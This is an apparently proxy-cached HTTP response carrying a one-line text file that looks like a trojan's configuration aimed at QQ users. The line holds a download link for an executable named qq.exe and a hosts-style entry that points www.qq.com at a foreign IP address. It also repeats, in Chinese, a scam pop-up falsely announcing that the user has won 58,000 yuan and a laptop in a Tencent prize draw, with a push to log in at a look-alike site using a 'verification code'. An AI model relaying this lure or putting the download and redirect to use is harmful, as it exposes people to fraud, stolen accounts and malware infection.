HTTP/1.1 200 OK
Content-Length: 447
ETag: "9034bd556b8dc91:2b3"
Date: Thu, 26 Feb 2009 05:33:04 GMT
Last-Modified: Thu, 12 Feb 2009 23:40:49 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://chj771277.3322.org/qq.txt?64
X-Polipo-Date: Thu, 26 Feb 2009 05:43:59 GMT
X-Polipo-Access: Thu, 26 Feb 2009 05:43:59 GMT

20080101|http://www.update.com/qq.exe|30|1440|1|1|尊敬的用户：您的QQ号已被腾讯“迎元旦贺新年”活动抽取为一等奖，获得58000元奖金及三星Q40笔记本电脑一台。请用户即登陆活动网:www.qqm5m.cn 领取奖品牢记验证码[668]|系统消息：尊敬的用户：您的QQ号已被腾讯“迎元旦贺新年”活动抽取为一等奖，获得58000元奖金及三星Q40笔记本电脑一台。请用户即登陆活动网:www.qqm5m.cn 领取奖品牢记验证码[668]|http://www.qqm5m.cn|1|61.147.107.185  www.qq.com|"幸运之星"有奖活动| 
